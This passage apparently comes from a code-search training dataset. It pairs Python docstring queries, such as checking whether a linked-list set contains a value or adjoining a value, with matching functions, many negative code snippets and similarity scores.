brute_force_search(f, fq_factors, bound)", "def test_f_uni(self):\n s = np.array([100.0, 0, 0, 0, 0, 0])\n e = np.array([0.1, -0.05, -0.05, 0, 0, 0])\n f_direct = self.model.f(s, e, self.t, self.T)\n \n sdev = s - np.array([1,1,1,0,0,0]) * np.sum(s[:3]) / 3.0\n se = np.sqrt(3.0/2.0) * la.norm(sdev)\n ee = np.sqrt(2.0/3.0) * la.norm(e)\n\n g_direct = self.smodel.g(se, ee, self.t, self.T)\n \n self.assertTrue(np.isclose(g_direct, f_direct[0]))\n\n self.assertTrue(np.isclose(-g_direct/2.0, f_direct[1]))\n self.assertTrue(np.isclose(-g_direct/2.0, f_direct[2]))\n\n self.assertTrue(np.allclose([0,0,0], f_direct[3:]))", "def parse_steer_functions(sf: str) -> [int]:\n total = len(steer_functions)\n sf = sf.replace(' ', '')\n if sf == '' or sf.lower() == \"all\":\n return list(range(total))\n\n def parse_int(s: str):\n return (int(s) + total) % total\n\n sfs = []\n rs = [s.strip() for s in sf.split(',')]\n for r in rs:\n if ':' in r:\n ri = r.index(':')\n start = 0 if ri == 0 else parse_int(r[:ri])\n end = total if ri == len(r) - 1 else parse_int(r[(ri + 1):])\n sfs += list(range(start, end))\n elif is_int(r):\n sfs.append(parse_int(r))\n elif r in steer_functions:\n sfs.append(steer_functions.index(r))\n else:\n click.echo('Substring \"%s\" could not identify a steer function.' %\n r,\n err=True)\n return sfs", "def generate_boolean_vector(f,q,r,DIMS):\n b = None\n for i in range(DIMS):\n if b is None:\n b = (f[:,i]<q[i]+r[i]) & (f[:,i]>q[i])\n else :\n b = b & (f[:,i]<q[i]+r[i]) & (f[:,i]>q[i])\n return b", "def sum_f(f, xs):\n sum = 0\n for x in xs:\n sum += f(x)\n return sum" ]
[ "0.58423346", "0.57762986", "0.572943", "0.56309384", "0.55529606", "0.554871", "0.5516751", "0.54883784", "0.5471321", "0.54678047", "0.54397553", "0.5426767", "0.54211754", "0.5374095", "0.5334541", "0.5296604", "0.5284521", "0.52649575", "0.52402025", "0.51693165", "0.51681167", "0.51127696", "0.51010865", "0.508186", "0.50750256", "0.5045613", "0.5027764", "0.5015021", "0.49996114", "0.49988872", "0.49974734", "0.49973333", "0.49705467", "0.4960215", "0.49399483", "0.4925519", "0.49251226", "0.49166805", "0.49038088", "0.48828644", "0.48750362", "0.48631313", "0.4863005", "0.4851726", "0.4843953", "0.4828023", "0.4822656", "0.48117152", "0.48110113", "0.48029268", "0.47947344", "0.47916597", "0.4789531", "0.47883272", "0.47873354", "0.47841272", "0.47744164", "0.47742698", "0.4767963", "0.47574127", "0.47358197", "0.4734498", "0.4734498", "0.47333366", "0.47197208", "0.47193193", "0.47153068", "0.47017804", "0.4689849", "0.4689849", "0.46797246", "0.4672469", "0.46671268", "0.46588048", "0.4655471", "0.46300417", "0.46252048", "0.4621823", "0.46165308", "0.46150807", "0.45934808", "0.4593357", "0.45904583", "0.45881528", "0.4584776", "0.4580219", "0.45791975", "0.45750624", "0.45741037", "0.45734304", "0.45564643", "0.455231", "0.45510522", "0.45459852", "0.45455006", "0.45418242", "0.45359215", "0.4527417", "0.4526426", "0.45245284" ]
0.5204124
19
Return true if set s contains value v as an element. >>> s = Link(1, Link(3, Link(2))) >>> contains(s, 2) True >>> contains(s, 4) False
def contains(s, v): head = s while not empty(head): if head.first == v: return True head = head.rest return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __contains__(self, v):\n for i in self:\n if v in i:\n return True\n False", "def contains(s, v):\n if empty(s):\n return False\n elif s.first == v:\n return True\n else:\n return contains(s.rest, v)", "def has(self, v):\n return v in self.values", "def __contains__(self, x):\n return x in (v for v, _ in self)", "def __contains__(self, x):\n return x in (v for v, _ in self)", "def test_contains(self):\n s = djset()\n s.add([1, 2, 3])\n s.add([4, 5, 6])\n self.assertTrue(2 in s)\n self.assertTrue(5 in s)", "def contains(self, val):\n\t\treturn Contains(self, val)", "def contains(self, value):\n if self.graph == None:\n return\n \n else:\n return contain(self.graph, value)", "def __contains__(self, vector: Vector) -> bool:\n for vec in self.__elements:\n if vec == vector:\n return True\n return False", "def contains(self, value):\n return value in self.values", "def contains(self, value):\n if self.root is None:\n return False\n return self.root.contains(value)", "def __contains__(self, n):\n try:\n return n in self.node\n except TypeError:\n return False", "def __contains__(self, elem):\n return elem in list(self)", "def contains(self, vertex):\n return vertex in self._graph", "def _contains(self, element):\n if not isinstance(element, Tuple) or len(element) != 2:\n return S.false\n\n if not element[1].is_Integer:\n return S.false\n\n if element[1] >= len(self.sets) or element[1] < 0:\n return S.false\n\n return self.sets[element[1]]._contains(element[0])", "def __contains__(self, item): # __iter__ would do this job by itself\n return (item in self.__values)", "def __contains__(self, item):\n cur_node = self.head\n while cur_node is not None:\n if item in cur_node.data_list:\n return True\n else:\n cur_node = cur_node.next_node\n\n return False", "def contains(self, key):\n index = self.key_to_index(key)\n node = self.hash_set[index]\n\n while node:\n if node.key == key:\n return True\n\n node = node.next\n\n return False", "def contains(self, x: object):\n return x in self.items", "def __contains__(self, item):\n return item in self.__keys or item in self.__vals", "def __contains__(self, item):\n\t\treturn item in self.__dict__.values()", "def __contains__(self, item: Any) -> bool:\n curr = self._first\n\n while curr is not None:\n if curr.item == item:\n return True\n\n curr = curr.next\n\n return False", "def contains(self, x):\n raise NotImplementedError", "def contains(self, value: T) -> bool:\n def traverse(children: list) -> bool:\n for node in children:\n if node.value == value:\n return True\n else: \n if traverse(node.children):\n return True\n \n if self.value == value:\n return True\n elif traverse(self.children):\n return True\n else:\n return False", "def contains(self, value):\n if not self.head:\n return False\n # get a reference to the node we're currently at; update this as we traverse the list\n current = self.head\n # check to see if we're at a valid node\n while current:\n # return True if the current value we're looking at matches our target value\n if current.get_value() == value:\n return True\n # update our current node to the current node's next node\n current = current.get_next()\n # if we've gotten here, then the target node isn't in our list\n return False", "def contains(self, value):\n if self.root is None:\n return False\n else:\n if type(value) != self.typing: # not an error\n return False\n # TODO allow different yet comparable types\n else: \n hasElement, self.root = self.root.contains(value)\n return hasElement", "def contains(self, x):\n raise NotImplementedError()", "def __contains__(self, item):\n # type(Any) -> bool\n return list.__contains__(self, self.ref(item))", "def _contains(self, element):\n if element.is_Symbol:\n return None\n\n if not isinstance(element, Tuple) or len(element) != len(self.sets):\n return S.false\n\n return And(*[s.contains(e) for s, e in zip(self.sets, element)])", "def __contains__(self, value):\n found = False\n for i in range(len(self.data)):\n if self.data[i] == value:\n return True\n return found", "def __contains__(self, item):\n\n if self[item]:\n return True\n return False", "def __contains__(self,v):\n for i in self._items:\n if near(i,v):\n return True\n return False", "def contains(self, item):\n return self._dict.has_key(item)\n\n self.__contains__ = contains", "def __contains__(self, item):\n if self.is_empty():\n return False\n elif self._first == item:\n return True\n else:\n return self._rest.__contains__(item)\n # Equivalently, item in self._rest", "def includes(self, value):\n current = self.head\n while current:\n if current.value == value:\n return True\n else:\n current = current.next\n return False", "def contains(cls, value):\n return value in cls.values()", "def contains(self, key):\n visitor = VisitorContains()\n self.visit(key, visitor)\n return visitor.result", "def __contains__(self, val):\n if self.lookup.get(val, 0) > 0:\n return True\n else:\n return False", "def contains(item, obj):\n return obj.__contains__(item)", "def includes(self, value):\n current = self.head\n\n while current:\n if current.value == value:\n return True\n current = current.next\n return False", "def __contains__(self, item: Any) -> bool:\n if self.is_empty():\n return False\n elif self._first == item:\n return True\n else:\n return self._rest.__contains__(item)\n # Equivalently, item in self._rest", "def contains(self, val):\n return False if not self.search(val) else True", "def __contains__(self, item):\n return item in self._data", "def includes(self, value):\n current = self.head\n\n while current is not None:\n if current.value == value:\n return True\n current = current.next\n return False", "def __contains__(self, item):\n return self.contains(item)", "def contains(self, key):\n\n return self._get(\"contains\", key, rtype=Bool)", "def contains_edge(self, u: str, v: str) -> bool:\n if v in self.adj_list[u]:\n return True\n else:\n return False", "def contains(self, key):\n h = self.hash_value(key)\n return key in self.hs[h]", "def has_node(self, val):\n return val in self", "def has_node(self, val):\n return val in self", "def __contains__(self, i):\n return i in self._ar", "def contains(self, element):\n pass", "def __contains__(self, item):\n try:\n self[item]\n return True\n except KeyError:\n return False", "def contains(collection, target):\n\treturn target in collection", "def contains(cls, value):\n return any(value == item.value for item in cls)", "def __contains__(self, val):\n return val in self.ids or super().__contains__(val)", "def contains(self, value):\n\n node, parent, found = self.search(value)\n\n return found", "def __contains__(self, item: T) -> bool:\n for list_item in self:\n if list_item == item:\n return True\n\n return False", "def __contains__(self, aVertex):\n\n if isinstance(aVertex, str) and aVertex in self._vertices.keys():\n return True\n elif aVertex in self._vertices.values():\n return True\n else:\n return False", "def contains2(s, v):\n if empty(s) or s.first > v:\n return False\n elif s.first == v:\n return True\n else:\n return contains2(s.rest, v)", "def containItem(self, value):\n\t\tif self._linkHead == None:\n\t\t\treturn False\n\n\t\t_nodeCursor = self._linkHead\n\n\t\twhile _nodeCursor != None and _nodeCursor._itemValue != value:\n\t\t\t_nodeCursor = _nodeCursor._itemNext\n\n\t\tif _nodeCursor == None:\n\t\t\treturn False\n\n\t\treturn True", "def contains(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\r\n return False", "def contains(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\r\n return False", "def contains(self, key: int) -> bool:\n hashedVal = self.hashValue(key)\n head = self.array[hashedVal] \n while(head != None): \n if head.val == key:\n return True\n head = head.next\n return False", "def contains(self, value):\n for item in self.data:\n if item == value:\n return item\n return False", "def is_in(cls, s, t):\n\n assert cls.is_selector(s)\n assert cls.is_selector(t)\n\n s_exp = set(cls.expand(s))\n if s_exp == set([()]):\n return True\n t_exp = set(cls.expand(t))\n if s_exp.issubset(t_exp):\n return True\n else:\n return False", "def contains(self, item):\n for h_num in xrange(self.k):\n val = self.hash_value(item, h_num)\n if not self.arr[val]:\n return False\n else:\n return True", "def __contains__(self, item):\n return item in self._fetch()", "def contains(self, val):\n val = self._conversion(val)\n if isinstance(val, TYPES[self.__set_type]):\n return self.__tree.search(val)\n else:\n return str(\"TypeError : Wrong Input\")", "def contains(self, d):\n\n temp = self.head\n while temp is not None:\n if temp.data == d:\n return True\n else:\n temp = temp.next\n\n return False", "def __contains__(self, i):\n for j in self:\n if j == i:\n return True\n return False", "def contains(self, key):\n return key in self.hashset[key % self.N]", "def __contains__(self, value):\n\n try:\n # Just use __getitem__()\n self[value]\n except KeyError:\n return False\n else:\n return True", "def contains(\n self, key: int | str | ir.IntegerValue | ir.StringValue\n ) -> ir.BooleanValue:\n return ops.MapContains(self, key).to_expr()", "def __contains__(self, key):\n\n return key in self.keys_set", "def contain(graph, value):\n for node in graph:\n if node.value == value:\n return True\n\n return False", "def has_item(self, item):\n return item in self.set", "def has_item(self, item):\n return item in self.set", "def __contains__ (self, item):\n if isinstance(item, Node):\n item = item.id\n return item in self.network", "def __contains__(self, key):\n return self.keys[self._linear_probe(key, \"contains\")] is not None", "def __contains__(self, item):\n # return item in self._items\n # leverage improved performance index() function\n try:\n self.index(item)\n return True\n except ValueError:\n return False", "def contained(self,s):\n\n if s in self.symbols:\n return True\n else:\n return False", "def contains(self, value: object) -> bool:\n cur = self.root\n while cur is not None:\n if value == cur.value:\n return True\n\n elif value < cur.value:\n cur = cur.left\n\n else:\n cur = cur.right\n\n return False", "def __contains__(self, item):\n return item in self.contents", "def __contains__(self, key):\n return self.contains(key)", "def contains(self, val):\n if val == self.val:\n return True\n elif val < self.val:\n if self.left is None:\n return False\n return self.left.contains(val)\n elif val > self.val:\n if self.right is None:\n return False\n return self.right.contains(val)", "def do_contains(d, *ks):\n try:\n _ = do_get(d, *ks)\n except KeyError:\n return False\n else:\n return True", "def contains(self, value):\n n = self.search(value)\n return (n.value==value, n)", "def contains(s1, s2):\n\n return s2 in s1", "def __contains__(self, key):\n\t\treturn any([item == key for _, item in self.heap])", "def contains(self, value):\n return LongObjectHashMap.self.containsValue(value)", "def contains(self, item):\n # Find a node with the given item, if any\n node = self._find_node(item)\n # Return True if a node was found, or False\n return node is not None", "def contains(base, sub_list):\n\n return set(base) & set(sub_list) == set(sub_list)", "def contains(self, key: int) -> bool:\n if key in self.d:\n return True\n else:\n return False", "def contains_vect(self, v: Tuple[float, float]) -> bool:\n assert len(v) == 2\n return bool(lib.cpBBContainsVect(self, v))", "def __contains__(self, key):\n found = True\n try:\n self.__getitem__(key)\n except:\n found = False\n return found", "def __contains__(self, item: Any) -> bool:\n try:\n return item in self.contents\n except TypeError:\n try:\n return item is self.contents\n except TypeError:\n return item == self.contents # type: ignore", "def tree_contains(T, x):\n if T.label == x:\n return True\n for c in T:\n if tree_contains(c, x):\n return True\n return False", "def has(cls, item):\n return item in cls.values()", "def contains(a, b, **kwargs):\n return lib.contains(a, b, **kwargs)" ]
[ "0.7584771", "0.7085561", "0.6912982", "0.6782562", "0.6782562", "0.6781164", "0.6648094", "0.6498835", "0.647441", "0.64625543", "0.6434304", "0.64121056", "0.6409181", "0.64012474", "0.63954437", "0.6387302", "0.63849604", "0.6380661", "0.634651", "0.63379276", "0.63075536", "0.6300176", "0.62924343", "0.628142", "0.62513894", "0.6242932", "0.62313217", "0.6226083", "0.6213911", "0.6212287", "0.62009454", "0.61986667", "0.6197378", "0.6192886", "0.6172995", "0.6170701", "0.6166052", "0.61624324", "0.6161323", "0.6155148", "0.61523384", "0.61380345", "0.61198765", "0.611585", "0.61127424", "0.610699", "0.6103992", "0.6101404", "0.6097174", "0.6097174", "0.6096107", "0.6090682", "0.6087924", "0.60854435", "0.6084288", "0.608075", "0.6074129", "0.60556024", "0.6051419", "0.6032506", "0.6022769", "0.6016537", "0.6016537", "0.6012653", "0.6004175", "0.6000692", "0.599946", "0.5995462", "0.59840304", "0.5980011", "0.5979232", "0.5979193", "0.5974428", "0.5970334", "0.595228", "0.5936049", "0.5922856", "0.5922856", "0.59191656", "0.5915123", "0.5907492", "0.59061116", "0.59009284", "0.5895329", "0.58912975", "0.5867798", "0.5863938", "0.5861764", "0.5860971", "0.585378", "0.58534545", "0.58425444", "0.58414406", "0.58345085", "0.5812435", "0.58096164", "0.58078116", "0.5804594", "0.5802712", "0.5796666" ]
0.7024014
2
Return Set s adjoin v
def adjoin(s, v): if contains(s, v): return s else: return Link(v, s)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_join(self):\n s = djset()\n s.add([1, 2, 3])\n s.add([4, 5, 6])\n s.add([2, 5])\n self.assertEquals({1, 2, 3, 4, 5, 6}, s.data[1])\n self.assertFalse(2 in s.data)", "def getSets():", "def aspset(self):\n try:\n return pset([x.aspset() for x in self])\n except Exception:\n try:\n return frozenpset([x.aspset() for x in self])\n except Exception:\n pass\n return frozenpset([x for x in self])", "def getSet(unique_name):", "def getSet(unique_name):", "def union(s1, s2):\n \"*** YOUR CODE HERE ***\"\n s = set()\n for member in s1:\n s.add(member)\n for member in s2:\n s.add(member)\n return s", "def union(set1, set2):", "def make_set(g, nodes):\n s = Set()\n names = nodes['names']\n for ii,name in enumerate(names):\n \"\"\" \n We will assume node is entirely contained\n in group if they have one atom in common\n \"\"\" \n atoms = mdn.dic2list(nodes[name]['atoms'])\n atom0 = atoms[0]\n if (atom0 in mdn.dic2list(g['atoms'])):\n s.add(ii)\n return s", "def getJoinedItemSet(self, termSet, k):\n return set([term1.union(term2) for term1 in termSet for term2 in termSet \n if len(term1.union(term2))==k])", "def getSets(unique_name=None):", "def set():", "def join(self, a, *args):\n mapping = self._mapping\n set_a = mapping.setdefault(a, [a])\n\n for arg in args:\n set_b = mapping.get(arg)\n if set_b is None:\n set_a.append(arg)\n mapping[arg] = set_a\n elif set_b is not set_a:\n if len(set_b) > len(set_a):\n set_a, set_b = set_b, set_a\n set_a.extend(set_b)\n for elem in set_b:\n mapping[elem] = set_a", "def joinSet(itemSet, length):\n return set([i.union(j) for i in itemSet for j in itemSet if len(i.union(j)) == length])", "def merge_working_sets(self, other):\n\n for dist in other.by_key.values(): self.add(dist)\n return self", "def intersect_sets(S):\n res = S[0]\n for s in S:\n res &= s\n return res", "def owningSet(self) -> ghidra.util.graph.KeyIndexableSet:\n ...", "def link_to_set(page):\n #s = set()\n links = Measurements.get_all_links(page)\n s = set(links)\n return s", "def union(self, otherpvalueset):\n for candidate in otherpvalueset.pvalues.itervalues():\n self.add(candidate)", "def intersection(self, s2):\n s1 = self\n if s1.is_full:\n return s2\n if s2.is_full:\n return s1\n return IdSet(s1._set.intersection(s2._set))", "def join(self, a, b):\n r = defaultdict(lambda: 0)\n c = itertools.chain(a.get_elements().items(),\n b.get_elements().items())\n for element, n in c:\n r[element] = Nat_add(r[element], n)\n\n r = dict(**r)\n return Multiset(r, self.S)", "def __add__(self, other):\n if not isinstance(other, (list, Set)):\n raise TypeError(\"sets can only be joined with sets\")\n new_set = self._clone()\n for element in other:\n new_set._insert(element)\n return new_set", "def get_ads():\n return coll_ad.distinct(KEY_AD_ID)", "def lego_sets():\n # you must replace this line and return your own list\n return []", "def union_sets(S):\n res = set()\n for s in S:\n res |= s\n return res", "def getDirectFollowSets(self, FIRST):\n self.init_follow = {v:set() for v in self.v }\n self.containsFOLLOWOf = set()\n for v in self.v:\n if v == self.np[0][0]: # Starting Production\n self.init_follow[v] = set(['$']) # $ is in follow of 'S' applying rule 1\n for prod in self.g[v]:\n for i in range(len(prod)):\n if prod[i] in self.v and i+1 < len(prod):\n if prod[i+1] in self.t:\n self.init_follow[prod[i]] |= set([prod[i+1]])\n else:\n t = i + 1\n while t < len(prod) and prod[t] in self.nullables_map:\n if self.nullables_map[prod[t]] == True:\n self.init_follow[prod[i]] |= FIRST[prod[t]]-set(['epsilon'])\n else:\n self.init_follow[prod[i]] |= FIRST[prod[t]]\n break\n t += 1\n if t >= len(prod): # every thing on rhs of prod[i] could produce epsison, rule - 3\n self.containsFOLLOWOf |= set([(prod[i], v)])\n else: #prod[i+1] is a non nullable prod or prod[t] was a terminal\n if prod[t] in self.t:\n self.init_follow[prod[i]] |= set([prod[t]])\n else:\n self.init_follow[prod[i]] |= FIRST[prod[t]]-set(['epsilon'])\n\n elif prod[i] in self.v:\n self.containsFOLLOWOf |= set([(prod[i], v)]) # applying rule 2\n\n #self.containsFOLLOWOf = set([(a, b) for (a, b) in self.containsFOLLOWOf if a != b]) # remove the self loops\n return self.init_follow", "def union(self, other):\n # initialize new Set from the elements in the first Set\n union_set = Set(self.get_elements())\n\n # add every element in the second Set to a new Set and return it\n for element in other.get_elements():\n union_set.add(element)\n return union_set", "def set(self) -> set:\n return set(self)", "def union(self, other):\n self.find_set()._link(other.find_set())", "def _eval_rewrite_as_Union(self, *sets, **kwargs):\n\n dj_union = S.EmptySet\n index = 0\n for set_i in sets:\n if isinstance(set_i, Set):\n cross = ProductSet(set_i, FiniteSet(index))\n dj_union = Union(dj_union, cross)\n index = index + 1\n return dj_union", "def __init__(self):\n self.EntireSet = []", "def getOneItemSet(self, transListSet):\n itemSet = set()\n for line in transListSet:\n for item in line:\n itemSet.add(frozenset([item]))\n return itemSet", "def _collect_set(self, pidset):", "def Set(self) -> None:", "def mst(v, e):\n vold = set(v)\n vnew = set([v[0]])\n result = set()\n edges = sorted(e)\n \n while vnew != vold:\n for uv in edges:\n old = (uv.v1 in vnew) + (uv.v2 in vnew)\n if old == 1:\n vnew.add(uv.v1)\n vnew.add(uv.v2)\n result.add(uv)\n #edges.remove(uv)\n break\n \n return result", "def copySet(_session, _set_src, _set_dst, _segment):\n it = _session.create_iterator(_session.sc_constraint_new(sc_constants.CONSTR_3_f_a_a,\n _set_src,\n sc.SC_ARC,\n 0), True)\n \n while not it.is_over():\n# s_el = it.value(2)\n# _idtf = _session.get_idtf(s_el)\n# el = s_el\n# if isSystemId(_idtf):\n# el = _session.create_el(_segment, _session.get_type(s_el))\n createPair(_session, _segment, _set_dst, it.value(2), _session.get_type(it.value(1)))\n it.next()", "def get_from_set(set_):\n for e in set_: return e", "def actg_to_set_list(s: list[list[str]], d: dict) -> list[set[int]]:\r\n s_out = [set() for m in range(len(s))]\r\n for i in range(len(s)):\r\n for j in range(len(s[i])):\r\n t = find_str_in_dict(s[i][j], d)\r\n s_out[i].add(t)\r\n return s_out", "def lego_sets():\n # you must replace this line and return your own list\n return lego_sets_list", "def insercionListas(L1,L2):\n return set(L1) & set(L2)", "def add_sets(self, key, member):\n return self.redis.sadd(key, member)", "def select_seeds(self, graph, k):\n raise NotImplementedError\n return set()", "def __mul__(self, other):\n if not isinstance(other, (Set, list)):\n raise TypeError(f\"could not intersect set and {type(other)}\")\n\n return Set(x for x in other if x in self)", "def union(set_1, set_2):\n union_list = []\n\n for number in set_2: # Adds numbers to set_1, since this is the last step\n set_1.append(number)\n \n set_1.sort()\n\n for number in set_1:\n if number not in union_list:\n union_list.append(number)\n \n print(\"Union:\", union_list)\n return set_1, set_2", "def union(a, b):\r\n return list(set(a) | set(b))", "def adjoint(self):\n return self.conjugate().transpose()", "def add_elements_to_set(s: set, *args) -> set:\n s.update(set(*args))\n return s", "def sets(self):\n return self._sets", "def toset(series: pd.Series) -> Set:\n\n return set(series.tolist())", "def join(self) -> List[Dict[str, Any]]:\n return self.matched + self.unmatched", "def edges(self) -> Set[Tuple[int, int]] : \n edges : Set[Tuple[int, int]] = set()\n for node_id in self.nodes: # iterator over id's\n for adj_node in self.nodes[node_id]:\n edge = (node_id, adj_node)\n if self.directed:\n edges.add(edge)\n else:\n if edge[::-1] not in edges: # if reverse edge not in edges...\n edges.add(edge)\n return edges", "def adjacent(self):\n result = set([v for e in self.edges for v in [e.v1, e.v2]])\n result.remove(self)\n return result", "def sets(self):\n\n return self._collection.distinct('set')", "def add_set(self, repres):\n s = self.set_indx(repres)\n if not s is None:\n raise Exception\n self._data.append(set(repres))", "def joins(self):\n return self._joins", "def get_set(css_class_name, set_num=0):\r\n if not root:\r\n return None\r\n item = root.xpath('//dl[@class=\"%s\"]/dd' % css_class_name)\r\n if len(item) <= set_num:\r\n return None\r\n sets_node = item[set_num]\r\n item_set = set([ut.unicodeanyway(node.text).replace('\\n', '')\r\n for node\r\n in sets_node.xpath('.//a') if node.text is not None])\r\n \r\n \r\n \r\n return item_set", "def merge_one_set(a):\n\n merge_to_index = 0\n determined = []\n while merge_to_index < len(a) - 1:\n compare_index = merge_to_index + 1\n while compare_index < len(a):\n intersection = a[merge_to_index].intersection(a[compare_index])\n if intersection:\n a[merge_to_index] = a[merge_to_index].union(a[compare_index])\n a.pop(compare_index)\n compare_index = merge_to_index + 1\n if len(intersection) > 1:\n determined = merge_two_sets(determined, [intersection,])\n else:\n compare_index += 1\n merge_to_index += 1\n \n return determined", "def _control_union(self, entities_1: List[str], entities_2: List[str]):\n return list(set(entities_1).union(set(entities_2)))", "def __and__(self, rs):\n revs = {}\n for r in self._revs.keys():\n if r in rs:\n revs[r] = 1\n return RevisionSet(revs)", "def _filter_satisfied(self, update_setd=False):\n\n model = self.oracle.get_model()\n setd = set()\n\n for i, cl in enumerate(self.soft):\n if not self.satc[i]:\n if self._satisfied(cl, model):\n self.satc[i] = True\n self.ss_assumps.append(self.sels[i])\n else:\n setd = setd.union(set(cl))\n\n if update_setd:\n self.setd = list(setd)", "def create_C1(data_set):\r\n C1 = set()\r\n for t in data_set:\r\n for item in t:\r\n item_set = frozenset([item])\r\n C1.add(item_set)\r\n return C1", "def build_set(self, s):\n comma = self.art_type([self.string_type(', ')], baseline=0)\n repr_elems = self.concatenate(s, comma)\n return self.build_container(\n repr_elems, self.left_curly_brace, self.right_curly_brace)", "def to_set(elem_sort, *elems):\n res = LambdaSet.get_empty(elem_sort)\n for elem in elems:\n res = res.insert(elem)\n return res", "def entities(self):\n triples = self.triples()\n return set(pd.concat((triples[\"head\"], triples[\"tail\"])))", "def merge(self, sets):\n merge = None\n for _, item in enumerate([item['data'] for item in sets]):\n if merge is None:\n merge = item\n else:\n Logger().info(\n 'Partition size = {0}'.format(\n PartitionRunner.merge_size(merge, item, how='outer', group_by=self._unique_columns)\n )\n )\n\n merge = merge.merge(\n item,\n on=self._unique_columns,\n how='outer'\n )\n return merge", "def alphabet(S):\r\n result = set()\r\n for s in S:\r\n for a in s:\r\n result.add(a)\r\n return result", "def build_set(ls, dsets):\n\n def noh(ls, dsets):\n \"\"\"\n This function remove hydrogens from the selection\n \"\"\"\n data_set = build_set(ls[1], dsets)\n\n noh_set = set()\n pred = oechem.OEIsHydrogen()\n\n for idx in data_set:\n atom = system.GetAtom(oechem.OEHasAtomIdx(idx))\n if not pred(atom):\n noh_set.add(idx)\n\n return noh_set\n\n def residues(ls):\n \"\"\"\n This function select residues based on the residue numbers. An example of\n selection can be:\n mask = 'resid A:16 17 19 B:1'\n \"\"\"\n # List residue atom index to be restrained\n res_atom_set = set()\n\n # Dictionary of lists with the chain residues selected to be restrained\n # e.g. {chainA:[res1, res15], chainB:[res19, res17]}\n chain_dic = {'': []}\n\n # Fill out the chain dictionary\n i = 0\n while i < len(ls):\n if ls[i].isdigit():\n chain_dic[''].append(int(ls[i]))\n i += 1\n else:\n try:\n chain_dic[ls[i]].append(int(ls[i + 2]))\n except:\n chain_dic[ls[i]] = []\n chain_dic[ls[i]].append(int(ls[i + 2]))\n i += 3\n\n # Loop over the molecular system to select the atom indexes to be selected\n hv = oechem.OEHierView(system, oechem.OEAssumption_BondedResidue + oechem.OEAssumption_ResPerceived)\n for chain in hv.GetChains():\n chain_id = chain.GetChainID()\n if chain_id not in chain_dic:\n continue\n for frag in chain.GetFragments():\n for hres in frag.GetResidues():\n res_num = hres.GetOEResidue().GetResidueNumber()\n if res_num not in chain_dic[chain_id]:\n continue\n for oe_at in hres.GetAtoms():\n res_atom_set.add(oe_at.GetIdx())\n\n return res_atom_set\n\n def around(dist, ls):\n \"\"\"\n This function select atom not far than the threshold distance from\n the current selection. The threshold distance is in Angstrom\n\n selection can be:\n mask = '5.0 around ligand'\n \"\"\"\n # at = system.GetAtom(oechem.OEHasAtomIdx(idx))\n\n # Atom set selection\n atom_set_around = set()\n\n # Create a OE bit vector mask for each atoms\n bv_around = oechem.OEBitVector(system.GetMaxAtomIdx())\n\n # Set the mask atom\n for at in system.GetAtoms():\n if at.GetIdx() in ls:\n bv_around.SetBitOn(at.GetIdx())\n\n # Predicate\n pred = oechem.OEAtomIdxSelected(bv_around)\n\n # Create the system molecule based on the atom mask\n molecules = oechem.OEMol()\n oechem.OESubsetMol(molecules, system, pred)\n\n # Create the Nearest neighbours\n nn = oechem.OENearestNbrs(system, float(dist))\n\n for nbrs in nn.GetNbrs(molecules):\n for atom in oechem.OEGetResidueAtoms(nbrs.GetBgn()):\n if atom.GetIdx() in ls:\n continue\n atom_set_around.add(atom.GetIdx())\n\n return atom_set_around\n\n # Start Body of the selection function by language\n\n # Terminal Literal return the related set\n if isinstance(ls, str):\n return dsets[ls]\n # Not or Noh\n if len(ls) == 2:\n if ls[0] == 'noh': # Noh case\n return noh(ls, dsets)\n elif ls[0] == 'not': # Not case\n return dsets['system'] - build_set(ls[1], dsets)\n else: # Resid case with one index\n return residues(ls[1])\n\n if len(ls) == 3:\n if ls[1] == 'or': # Or Case (set union)\n return build_set(ls[0], dsets) | build_set(ls[2], dsets)\n elif ls[1] == 'and': # And Case (set intersection)\n return build_set(ls[0], dsets) & build_set(ls[2], dsets)\n elif ls[1] == 'diff': # Diff case (set difference)\n return build_set(ls[0], dsets) - build_set(ls[2], dsets)\n elif ls[1] == 'around': # Around case\n return around(ls[0], build_set(ls[2], dsets))\n else:\n return residues(ls[1:]) # Resid case with one or two indexes\n else:\n if ls[0] == 'resid':\n return residues(ls[1:]) # Resid case with multiple indexes\n else:\n raise ValueError(\"The passed list have too many tokens: {}\".format(ls))", "def find_set(self):\n return self._set_set(self._find_set())", "def buildConnectedSets(self, cars):", "def get_joins(self, p, vv):\n self._get_joins(p, vv)", "def create_relation_superset(self):\n # trace = [a, b, c]\n # trace x trace = [(a, a), (a, b), ..., (c, a), (c, b), (c, c)]\n return itertools.product(self.activities, self.activities)", "def create_C1(data_set):\n C1 = set()\n for t in data_set:\n for item in t:\n item_set = frozenset([item])\n C1.add(item_set)\n return C1", "def apply(self):\n results = set()\n\n source = self.create_relation_superset()\n\n total_traces = len(self.log)\n\n if total_traces == 0:\n return list(results)\n\n if self.mode == Relationship.Mode.FORALL: # For all condition\n for a1, a2 in source:\n res = 0\n for trace in self.log:\n apply = self.apply_to_trace(trace, a1, a2)\n res += 1 if apply else 0\n\n if res / total_traces >= (1 - self.noise_threshold):\n results.add((a1, a2))\n\n elif self.mode == Relationship.Mode.EXISTS: # Exists condition\n for a1, a2 in source:\n res = False\n for trace in self.log:\n res = res or self.apply_to_trace(trace, a1, a2)\n\n if res:\n break\n\n if res:\n results.add((a1, a2))\n\n return list(results)", "def single(self):\r\n\t\treturn list(set(self.sample))", "def build_adj_dict(self, Set):\n \t\tif len(Set):\n\n \t\t\tfor bubble in Set:\t\n \t\t\t\t\n \t\t\t\tdistance = dist(bubble.Bubble_last_pos, self.Bubble_last_pos)\n \t\t\t\tif distance <= (bubble.Bubble_radius * 1.2 + self.Bubble_radius * 1.2):\n \t\t\t\t\t# add edge between new bubble and existing bubble\n \t\t\t\t\tif bubble.color not in self.adj_dict.keys():\n\t\t\t\t\t\tself.adj_dict.setdefault(bubble.color,[]).append(bubble)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif bubble not in self.adj_dict[bubble.color]:\n\t\t\t\t\t\t\tself.adj_dict[bubble.color].append(bubble)\n\n\t\t\t\t\t\n\t\t\t\t\tif self.color not in bubble.adj_dict.keys(): \n\t\t\t\t\t\tbubble.adj_dict.setdefault(self.color,[]).append(self)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif self not in 